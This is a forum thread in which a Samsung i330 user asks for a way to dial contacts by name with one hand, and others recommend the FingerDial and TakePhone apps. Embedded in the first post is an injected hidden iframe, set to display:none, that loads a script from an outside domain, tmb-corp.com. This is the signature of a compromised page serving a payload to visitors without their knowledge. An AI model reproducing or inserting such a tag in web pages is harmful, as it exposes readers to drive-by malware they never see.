Dialing one handed while driving?

I jsut upgraded from an older Neopoint phone that I loved. there still is nothing like it and it is 4 years old. I am used to clicking on the letters of a last name..i.e. SMITH, you would hit 7,6,4,2,4 (you don't have to hit the 7 four times) and then you could tab thru home, cell and work numbers. Is there a program I can get to work with the i330 to do this.

I find myself having to hit too many buttons to make call to someone who isn't on speed dial or voice activation.

I reallyu don't want to go to Treo to accomplish this,,,any ideas?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

pdaapps.com has a program called fingerdial that does exactly what you are looking for...worth every penny...I have used it for years on both the I300 and now the I330...

dialing

I ended up finding TakePhone. So far so good. Is the product you have better? What I find hard to believe is that Samsung doesn't make this part of the phone. This is crazy.

Takephone

I Agree that Takephone fits the bill.

I have used it first on my i300 and now on my i330. Do a search on the forum and you will find out lots about it.

You can download the latest version of TAKEphONE here

It now has full-screen support.

FingerDial isn't from PDAApps, it's from http://www.fingerclick.com. It's a great app, although I ended up liking TakePhone better.

Update from Shimon

I just bought the version from Handango. I see a Beta on your web site. Is this what you were talking about?
